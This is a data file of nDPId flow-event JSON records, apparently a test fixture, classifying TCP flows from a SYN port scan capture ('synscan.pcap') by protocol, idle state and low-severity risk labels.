+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00736{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"","server_signature":"","hassh_client":"","hassh_server":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} 
+00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 
+00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
